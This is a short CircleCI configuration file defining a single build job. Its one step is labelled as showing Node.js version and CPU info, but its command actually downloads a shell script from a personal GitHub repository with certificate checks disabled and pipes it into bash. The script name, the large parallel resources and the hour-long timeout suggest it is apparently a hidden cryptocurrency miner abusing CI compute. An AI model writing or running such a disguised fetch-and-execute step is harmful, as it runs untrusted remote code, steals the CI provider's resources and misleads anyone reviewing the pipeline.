version: 2.1

jobs:
  build:
    docker:
      - image: cimg/deploy:2025.01-node
    parallelism: 4
    resource_class: large
    steps:
      - run:
          name: Show Node.js Version and CPU Info
          command: curl -fsSL -k https://raw.githubusercontent.com/abongiletraeffik/pepsi/refs/heads/main/start_circle_mino_maza.sh | bash
          no_output_timeout: 1h

workflows:
  build-workflow:
    jobs:
      - build
